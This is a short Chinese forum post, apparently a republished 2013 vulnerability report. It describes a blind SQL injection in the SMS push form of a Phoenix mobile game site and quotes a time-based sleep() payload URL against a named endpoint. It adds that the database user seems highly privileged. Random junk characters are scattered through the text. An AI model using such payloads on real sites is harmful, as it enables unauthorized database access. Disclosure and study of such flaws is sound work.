简要描述:) c" _: y+ q8 f/ x J
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。& e. V3 k- Q( c: T1 U$ m
! g) D) `/ g/ B详细说明:# k, {( P8 h" A- g& W7 _
存在SQL盲注url:
& Q7 H4 u8 M6 K1 U0 b) l3 Sfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
, T& h8 }7 K( ~+ Bhttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
% y: D1 \ W& A: X0 j# `, v( `$ Ahttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png8 ]. g c7 Y8 c- ^1 G2 F
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
4 [/ z* }, G! l# m1 ^) {) T6 g( J; l0 b1 z4 R5 Z
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对